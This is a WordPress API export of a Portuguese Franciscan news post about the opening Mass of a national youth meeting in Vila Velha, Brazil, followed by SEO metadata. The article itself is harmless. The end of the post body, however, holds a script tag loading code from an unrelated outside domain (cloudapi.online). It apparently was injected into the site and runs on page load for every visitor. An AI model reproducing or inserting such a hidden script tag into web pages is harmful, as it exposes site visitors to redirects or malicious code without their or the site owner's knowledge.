{"id":166865,"date":"2018-07-19T17:03:51","date_gmt":"2018-07-19T20:03:51","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=166865"},"modified":"2019-10-30T11:22:36","modified_gmt":"2019-10-30T14:22:36","slug":"prontos-para-servir-vai-comecar-o-enfj","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html","title":{"rendered":"Prontos para servir. Vai come\u00e7ar o ENFJ."},"content":{"rendered":"<p><img loading=\"lazy\" class=\"size-full wp-image-213000 aligncenter\" src=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718.jpg\" alt=\"\" width=\"830\" height=\"440\" srcset=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718.jpg 830w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718-450x239.jpg 450w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718-768x407.jpg 768w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718-150x80.jpg 150w\" sizes=\"(max-width: 830px) 100vw, 830px\" \/><\/p>\n<p>Come\u00e7ou o 3\u00ba Encontro Nacional Franciscano de Juventudes em Vila Velha (ES). Nesta quarta-feira, 18 de julho, foi celebrada a &#8220;Missa do Envio&#8221;, que reuniu a grande equipe de leigos e volunt\u00e1rios que v\u00e3o trabalhar no Encontro Nacional Franciscano de Juventudes (ENFJ), promovido pela Confer\u00eancia dos Frades Menores do Brasil. Frei Diego Melo, animador provincial do Servi\u00e7o Vocacional da Prov\u00edncia (SAV), presidiu a celebra\u00e7\u00e3o no Santu\u00e1rio do Divino Esp\u00edrito Santo , acolhendo os frades e jovens que j\u00e1 chegaram a Vila Velha, vindos de todo o pa\u00eds.<\/p>\n<p>Frei Diego iniciou destacando o valor de cada pessoa que ali estava. N\u00e3o s\u00f3 dos que est\u00e3o envolvidos nos trabalhos, mas tamb\u00e9m das fam\u00edlias que v\u00e3o acolher os jovens em suas casas. Ele destacou que n\u00e3o s\u00e3o simplesmente volunt\u00e1rios, mas pessoas que receberam um chamado e disseram o \u201csim\u201d. Crist\u00e3os que se colocaram \u00e0 disposi\u00e7\u00e3o para servir a Deus!<\/p>\n<p><img loading=\"lazy\" class=\"alignright wp-image-166868\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/07\/encontro_190718_2.jpg\" alt=\"encontro_190718_2\" width=\"235\" height=\"274\" \/>Frei Diego comentou tamb\u00e9m que esse evento ser\u00e1 de muita simplicidade, humildade e entrega. \u201cDevemos estar atentos aos sinais de Deus\u201d, disse ao chamar Rogerinho, um membro conhecido por muitos que frequentam o Santu\u00e1rio.<\/p>\n<p>\u201cHoje pela manh\u00e3 encontrei Rogerinho na descida do Convento com essa sacola de fitinhas de Nossa Senhora da Penha para dar de lembran\u00e7a aos jovens. Um ato simples, mas de muita dedica\u00e7\u00e3o e humildade. Um exemplo de amor e doa\u00e7\u00e3o\u201d, contou o Frei.<\/p>\n<p>Ap\u00f3s a homilia, Frei Diego pediu para que todas as pessoas que estar\u00e3o em servi\u00e7o nesses dias, que vestissem a camisa do evento e se aproximassem do altar, onde fizeram um juramento de servir como fam\u00edlia que cuida e doa o que tem de melhor.<\/p>\n<p>A celebra\u00e7\u00e3o terminou com os freis unidos na frente do altar, aben\u00e7oando toda a assembleia com a b\u00ean\u00e7\u00e3o de envio e entregando aos presentes um TAU trazido de Assis, especialmente para esse momento.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/07\/encontro_190718_4.jpg\" alt=\"encontro_190718_4\" width=\"830\" height=\"423\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>3\u00ba ENFJ<\/p>\n","protected":false},"author":1,"featured_media":193506,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[240,1163],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Prontos para servir. Vai come\u00e7ar o ENFJ. - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Prontos para servir. Vai come\u00e7ar o ENFJ. - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"3\u00ba ENFJ\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-19T20:03:51+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T14:22:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718_d.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718_d.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718_d.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html\",\"name\":\"Prontos para servir. Vai come\u00e7ar o ENFJ. - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#primaryimage\"},\"datePublished\":\"2018-07-19T20:03:51+00:00\",\"dateModified\":\"2019-10-30T14:22:36+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Prontos para servir. Vai come\u00e7ar o ENFJ.\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Prontos para servir. Vai come\u00e7ar o ENFJ. - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html","og_locale":"pt_BR","og_type":"article","og_title":"Prontos para servir. Vai come\u00e7ar o ENFJ. - Not\u00edcias - Franciscanos","og_description":"3\u00ba ENFJ","og_url":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-07-19T20:03:51+00:00","article_modified_time":"2019-10-30T14:22:36+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718_d.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718_d.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/encontro_190718_d.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html","name":"Prontos para servir. Vai come\u00e7ar o ENFJ. - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#primaryimage"},"datePublished":"2018-07-19T20:03:51+00:00","dateModified":"2019-10-30T14:22:36+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/prontos-para-servir-vai-comecar-o-enfj.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Prontos para servir. Vai come\u00e7ar o ENFJ."}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/166865"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=166865"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/166865\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/193506"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=166865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=166865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=166865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}